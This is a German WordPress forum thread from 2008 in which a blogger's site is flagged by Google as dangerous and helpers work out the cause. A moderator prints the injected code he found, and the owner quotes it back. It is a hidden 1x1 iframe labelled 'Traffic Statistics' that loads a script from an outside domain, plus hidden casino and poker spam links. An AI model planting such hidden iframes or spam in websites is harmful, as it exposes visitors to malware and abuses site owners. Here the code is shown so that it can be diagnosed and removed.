Zurück   WordPress Deutschland Forum > Café > Netzwelten
Registrieren Hilfe Benutzerliste Suchen Heutige Beiträge Alle Foren als gelesen markieren Threads ohne Antworten

Antwort
 
Themen-Optionen Ansicht
Alt 16.02.2008, 21:53   #1 (permalink)
PostRank: 0
 
Benutzerbild von Miko
 
Registriert seit: 16.02.2008
Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
Bei Google als "Gefährliche Seite" gesperrt

Ich bin freier Mitarbeiter beim BOINC Projekt "Spinhenge@Home" und leite das BOINC Info-, Hilfe- und Userteam "Crunching-Family.at".
Als Infofeature betreibe ich seit ca. 1 Jahr den "BOINC Blog"
Dort werden nur die News von BOINC und den Projekten ins deutsche übersetzt und veröffentlicht.
Ich benutze WP Vers. 2.1.2.
Nach der Installation habe ich ausser ein paar Plugins nichts mehr verändert, auch keine Updates gemacht.
(ich habe keine Ahnung von Servern, Datenbänken etc...)
Bisher lief alles Bestens.
Letzte Woche bekam ich eine Email von Google das mein Blog künftig mit einem besonderen Gefahrenvermerk versehen ist weil er eine Gefahr für Besucher darstellt (oder Ähnlich).
Ich dachte erst an eine gefakte Mail und habe einfach nach "BOINC Blog" gegooglet.
Auf der Ergebnisseite der Anfrage steht mein Blog auch an erster Stelle, aber mit folgendem Vermerk:
"Diese Website kann Ihren Computer beschädigen."

Geht es anderen Blogs ähnlich?

Warum kann mein Blog jetzt plötzlich (angeblich)
andere Computer beschädigen und was kann ich dagegen unternehmen?
Kann mir bitte jemand weiterhelfen?

Mit Dank und Gruss
Miko
Miko ist offline   Mit Zitat antworten
Alt 17.02.2008, 03:08   #2 (permalink)
PostRank: 10
 
Registriert seit: 05.01.2006
Beiträge: 3.489
schick ne email hin und frage nach, warum.
__________________
Psychomuell :: blogZicke!
SuMu ist offline   Mit Zitat antworten
Alt 17.02.2008, 12:15   #3 (permalink)
WPD-Team
 
Benutzerbild von jottlieb
 
Registriert seit: 20.08.2005
Ort: Berlin
Beiträge: 10.575
Ansonsten wäre es bei einer veralteten WP-Version nicht undenkbar, dass Schadcode in deinen Blog geschleust wurde.

Aber wie schon gesagt ist das eine Sache, die du mit Google klären musst.
__________________
Wordpress FAQ (Häufig gestellte Fragen) | Themepool
"Eine gut gestellte Frage ist schon halb beantwortet."
jottlieb ist offline   Mit Zitat antworten
Alt 18.02.2008, 11:45   #4 (permalink)
PostRank: 0
 
Registriert seit: 18.02.2008
Beiträge: 2
Das Problem hatte ich auch.Einfach ne Mail an Google geschrieben und schon hat sich das geklärt
__________________
Free SMS ohne Anmeldung auf www.Biepmaz.de
biepmaz ist offline   Mit Zitat antworten
Alt 18.02.2008, 17:02   #5 (permalink)
PostRank: 0
 
Benutzerbild von Miko
 
Registriert seit: 16.02.2008
Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
Ich hab mal ne email geschickt, den sachverhalt erklährt und um ggfs neue Prüfung und Aufhebung des Sperrvermerks gebeten.

Das Problem dabei war das ich keine vernünftige Emailadresse hatte...
(Die Google Benachrichtigung kam von "noreturn@google.com")
Also hab ich die Mail an 8 ausgedachte Adressen wie support@google.com, info@google.com, security@google.com usw geschickt...
Ein paar waren nicht zustellbar, der Rest ist angekommen.
Ich bin echt gespannt obs was hilft!
Ich werde Euch hier auf dem Laufenden halten!

DANKE für den Email-Tipp!

Gruss
Miko
Miko ist offline   Mit Zitat antworten
Alt 12.03.2008, 07:43   #6 (permalink)
PostRank: 0
 
Benutzerbild von Miko
 
Registriert seit: 16.02.2008
Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
...bisher keine Antwort!
Hat jemand bitte eine Emailadresse für mich?
Miko ist offline   Mit Zitat antworten
Alt 13.03.2008, 22:14   #7 (permalink)
PostRank: 4
 
Registriert seit: 01.08.2006
Beiträge: 154
Schau mal hier: How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has?

Zitat:
Once you have reviewed your site and are sure it is clean, you can can submit a request for review. Note that you'll need to verify site ownership before you can request reconsideration of a site.

1. Sign in to Webmaster Tools with your Google account.
2. On the Dashboard, in the Tools list on the right-hand side of the screen, click Request reconsideration and follow the instructions.
Lim_Dul ist offline   Mit Zitat antworten
Alt 13.03.2008, 23:39   #8 (permalink)
WPD-Moderator
 
Benutzerbild von Alphawolf
 
Registriert seit: 31.05.2005
Ort: Gera Ghetto
Beiträge: 2.258
Der Schadcode ist folgender:
Code:
<!-- Traffic Statistics -->
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->
<noscript>Ein Bluff beimm <a href="http://www.edsab.com">online poker</a> fliegt also nicht auf.</noscript><noscript>Sie bieten eine enorme Wahl aus allen popularen <a href="http://www.eigeneer.com">casino</a>.</noscript>
Mein AntiVir meldete sich mit einer schönen Nachtmusik...
__________________
FAQ // Doku // Erbreiterungen
Alphawolf ist offline   Mit Zitat antworten
Alt 14.03.2008, 17:09   #9 (permalink)
PostRank: 0
 
Benutzerbild von Miko
 
Registriert seit: 16.02.2008
Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
Zitat:
Zitat von Alphawolf Beitrag anzeigen
Der Schadcode ist folgender:
Code:
<!-- Traffic Statistics -->
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->
<noscript>Ein Bluff beimm <a href="http://www.edsab.com">online poker</a> fliegt also nicht auf.</noscript><noscript>Sie bieten eine enorme Wahl aus allen popularen <a href="http://www.eigeneer.com">casino</a>.</noscript>
Mein AntiVir meldete sich mit einer schönen Nachtmusik...

! ! ! DANKE ! ! !
Ich habe den und einen ähnlichen Code unter 2 meiner Beiträge gefunden.
Beide sind gelöscht
Mein Admin PW ist geändert und ich habe die Userrechte stark eingeschränkt.
Dann habe ich den von "Lim_Dul" beschriebenen Weg benutzt und den Blog zur erneuten Überprüfung angemeldet.
(das soll leider "etwas" dauern...)
Hoffentlich hilfts!

Ich halte Euch auf dem Laufenden.
Gruss
Miko
Miko ist offline   Mit Zitat antworten
Alt 18.03.2008, 18:35   #10 (permalink)
PostRank: 0
 
Benutzerbild von Miko
 
Registriert seit: 16.02.2008
Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
Der Warnvermerk bei Google ist endlich weg!!!!

Nochmal VIELEN DANK an alle!!!

Mit Gruss
Miko
Miko ist offline   Mit Zitat antworten
Antwort


Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist aus.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Alle Zeitangaben in WEZ +2. Es ist jetzt 23:48 Uhr.


Sponsoren:

Powered by vBulletin® Version 3.7.3 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0  — ImpressumEin Inpsyde.com Projekt